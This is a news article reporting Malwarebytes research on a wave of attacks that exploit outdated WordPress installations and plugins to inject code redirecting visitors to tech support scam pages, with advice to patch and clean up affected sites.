This article is more than 1 year old
Couldn't give a fsck about patching? Well, that's your WordPress website pwned, then
Fiends use vulns to lure victims into tech support scams
Website admins are urged to update their WordPress installations as soon as possible to the latest version following a rash of attacks exploiting known vulnerabilities in the web publishing software.
Researchers at Malwarebytes say miscreants don't appear to be targeting any one specific bug, but rather a full array of flaws in older versions of WordPress and its various plugins.
"During the past few days, our crawlers have been catching a larger-than-usual number of WordPress sites being hijacked," noted MalwareBytes researcher Jérôme Segura on Thursday.
"One of the most visible client-side payloads we see are redirections to tech support scam pages. Digging deeper, we found that this is part of a series of attacks that have compromised thousands of WordPress sites since early September."
From there, the nasty code loads when the WordPress site is accessed and redirects users to scam pages – most notably fake tech support sites and hard-to-remove "evil cursor" scareware screens.
So phar, so FUD: PHP flaw puts WordPress sites at risk of hacksREAD MORE
"Website owners affected by these attacks will have to perform a thorough cleanup of injected pages, databases, and backdoors," Segura explained.
"More importantly, they will need to identify the root cause of the compromise, which often times is an outdated WordPress installation or plugin."
WordPress is no stranger to large-scale attacks on its platform. The widely-used CMS is an attractive target for cybercriminals as its vulnerabilities most often provide an attacker with a way to covertly compromise sites and inject code for further attacks.
Earlier this year, fellow CMS vendor Drupal took its turn in the shooting barrel as attackers seized on a bug known as 'Drupalgeddon' to inject things like cryptocoin mining scripts into pages. ®